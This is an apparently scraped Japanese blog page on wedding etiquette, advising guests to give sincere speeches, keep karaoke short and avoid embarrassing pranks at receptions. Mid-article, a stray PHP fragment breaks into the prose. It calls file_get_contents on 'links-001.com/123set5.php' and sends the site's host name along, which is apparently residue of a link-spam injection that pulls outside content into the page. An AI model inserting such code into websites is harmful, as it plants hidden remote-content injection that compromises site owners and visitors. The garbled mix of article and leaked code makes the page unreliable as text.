前へ
次へ

結婚式のマナー【引き出物】について

引き出物には選ばない方がよい品物や気を付けるべき点がありますので、結婚式のマナーとして選び方のポイン

more

少し変わった結婚式のマナーがある北海道

全国各地に冠婚葬祭に関して様々なマナーやしきたりがありますが、その中でも特に結婚式のマナーで他の自治

more

結婚式のマナーは覚えておきましょう

結婚式の招待状を送ってもらった時から結婚式のマナーは関係してきます。
具体的にどんなところが関

more

悪ふざけや悪い冗談は結婚式のマナーに反します

社会人になると友達や同僚の結婚式に招待されることが多くなります。
そんな時に慌てなくて済むように前もって結婚式のマナーを学習しておきましょう。
結婚式のマナーといってもそれは別に難しいことではありません。
一般的な社会常識で通用する部分がほとんどです。
友達の結婚式の披露宴に招待されるとその会場はスピーチや余興などで大いに盛り上がっています。
この披露宴はあくまで公の場であるということを心に留めておいてください。
結婚式のハイライトがスピーチや余興です。
スピーチには心のこもったものや、人の心を打つものが多いのですが、ただただ言葉を並べるだけの面白みのない長いスピーチもあります。
そんなスピーチをしないために心がけておくことがあります。
それは自分がこれからしようとするスピーチに愛がこもっているかどうかです。
心に愛がなければどんなに美しく着飾った言葉も相手の胸には響かないものです。
飾らない真摯な言葉で新郎新婦の門出をお祝いしましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

難しいのが結婚式の披露宴で出される数々の余興です。
一番多いのが断然カラオケではないでしょうか。
このカラオケには若干の注意が必要です。
それが行き過ぎてしまえば、まるでそれはカラオケのコンテストみたいになってしまうからです。
そうなってしまえば結婚披露宴の雰囲気はぶち壊されます。
そういうことにならないようにカラオケに対しては歌の数などを制限する必要があります。
楽器の演奏でもあまり長いものはふさわしくありません。
気をつけたいのは結婚式の披露宴でみられる数々の悪ふざけです。
それが冗談で通っているうちは良いのですが、これから結婚をなされる新郎新婦の顔色が青ざめるような冗談では、新郎新婦の門出を祝うことにはなりません。
結婚式のマナーとして、他の大勢のゲストに非常識と思われてしまうような言動や行動をとることは絶対に控えなければなりません。
些細な悪ふざけやちょっとした冗談が、お祝いムードを台無しにしてしまうこともありますので十分な注意が必要です。

Page Top